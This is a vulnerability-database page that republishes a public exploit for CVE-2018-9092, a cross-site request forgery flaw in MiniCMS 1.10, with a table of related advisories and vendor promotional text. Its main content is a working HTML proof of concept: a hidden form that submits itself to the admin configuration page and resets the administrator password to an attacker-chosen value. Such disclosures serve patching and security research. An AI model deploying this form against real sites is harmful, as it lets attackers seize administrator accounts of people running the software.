| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| MiniCMS 1.10 - Cross-Site Request Forgery Vulnerability | 30 Mar 201800:00 | – | zdt | |
| CVE-2018-9092 | 27 Mar 201822:29 | – | attackerkb | |
| MiniCMS Cross-Site Request Forgery Vulnerability | 28 Mar 201800:00 | – | cnvd | |
| CVE-2018-9092 | 27 Mar 201822:00 | – | cve | |
| CVE-2018-9092 | 27 Mar 201822:00 | – | cvelist | |
| EUVD-2018-20695 | 7 Oct 202500:30 | – | euvd | |
| MiniCMS 1.10 - Cross-Site Request Forgery | 30 Mar 201800:00 | – | exploitpack | |
| CVE-2018-9092 | 27 Mar 201822:29 | – | nvd | |
| MiniCMS 1.10 Cross Site Request Forgery | 31 Mar 201800:00 | – | packetstorm | |
| Cross site request forgery (csrf) | 27 Mar 201822:29 | – | prion |
<--
# Exploit Title: MiniCMS 1.10 CSRF Vulnerability
# Date: 2018-03-28
# Exploit Author: zixian([email protected]、[email protected])
# Vendor Homepage: https://github.com/bg5sbk/MiniCMS
# Software Link: https://github.com/bg5sbk/MiniCMS
# Version: 1.10
# CVE : CVE-2018-9092
There is a CSRF vulnerability that can change the administrator account password
After the administrator logged in, open the following page
poc:
-->
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=GB2312">
<title>test</title>
<body>
<form action="http://127.0.0.1/minicms/mc-admin/conf.php" method="post">
<input type="hidden" name="site_name" value="hack123" />
<input type="hidden" name="site_desc" value="hacktest" />
<input type="hidden" name="site_link" value="http://127.0.0.1/minicms" />
<input type="hidden" name="user_nick" value="hack" />
<input type="hidden" name="user_name" value="admin" />
<input type="hidden" name="user_pass" value="hackpass" />
<input type="hidden" name="comment_code" value="" />
<input type="hidden" name="save" value=" " />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</head>
</html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation